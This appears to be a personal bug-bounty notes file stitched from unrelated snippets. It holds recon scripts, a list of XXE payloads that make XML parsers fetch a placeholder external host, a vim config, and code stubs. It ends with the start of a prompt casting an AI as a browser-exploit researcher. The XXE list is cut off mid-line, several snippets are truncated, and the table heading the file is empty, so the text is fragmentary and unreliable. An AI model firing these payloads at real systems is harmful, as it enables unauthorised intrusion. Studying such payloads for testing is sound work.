| Security Issue | Trigger |
|---|---|
```python
import sys

# Target domain the candidate subdomains are generated for
scope = sys.argv[1]
wordlist = open('/home/levi/Desktop/Warzone/Base/tools/wordlists/commonspeak.txt').read().split('\n')

# Print one candidate hostname per non-empty wordlist entry
for word in wordlist:
    if not word.strip():
        continue
    print('{}.{}'.format(word.strip(), scope))
```
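```bash
# Collect known URLs for the target ($1) and keep only their paths
gau "$1" | unfurl -u paths | tee "$1.txt"
# Split the paths into individual segments, one per line
sed 's#/#\n#g' "$1.txt" | sort -u | tee temp.txt
# Segments without a dot are treated as directory names
grep -Ev '\.' temp.txt | tee "paths-$1.txt"
# Drop static assets; -E is needed for the alternation to be interpreted
grep -Ev '(png|jpg|css|gif|woff|pdf)' temp.txt | tee relevant-files.txt
# Remaining segments that contain a dot are treated as file names
grep '\.' relevant-files.txt | tee "files-$1.txt"
rm temp.txt relevant-files.txt "$1.txt"
```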
```xml
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
```
```python
#!/usr/bin/env python
from multiprocessing.pool import ThreadPool
from time import time as timer
from urllib.request import urlopen
import sys
import re
import os.path

start = timer()
```
```vim
:set number
:set autoindent
:set tabstop=4
:set ts=4
:set shiftwidth=4
:set smarttab
:set softtabstop=4
:set mouse=a
:set encoding=UTF-8
:set autoindent
```
```javascript
function findUnicodeVariants(input) {
  const results = [];
  const inputLower = input.toLowerCase();
  const inputUpper = input.toUpperCase();
  const startSubstrLower = inputLower.slice(0, 2); // First 2 chars for substring check
  const startSubstrUpper = inputUpper.slice(0, 2);

  // Function to test a full-string variant
  function testFullVariant(original, variant, pos, unicodeChar, codePoint) {
    const upper = variant.toUpperCase();
```
You are a top-tier browser security researcher, in the spirit of people like:
- Samuel Groß (saelo), Natalie Silvanovich, Mark Brand, Jann Horn, Mateusz Jurczyk, Ben Hawkes, Maddie Stone (Google Project Zero / Chrome & V8 / sandbox / in-the-wild work),
- Bruno Keith (@bkth_), Niklas Baumstark (@_niklasb) (Dataflow Security; Pwn2Own Chrome/Edge/WebKit chains),
- Qixun Zhao (S0rryMyBad), Mem2019, Halbecaf, _tsuro (CTF & real-world V8/WebKit/Chakra/SpiderMonkey exploitation),
- Man Yue Mo, Manfred Paul, Hossein Lotfi (Chrome/V8 RCEs, ZDI, Pwn2Own),
- Linus Henze, BlueFrostSecurity folks (WebKit/Safari & JS engine research),
- Jack (jhalon), madstacks, rycbar77 (long-form V8 / browser exploitation education and public exploit write-ups),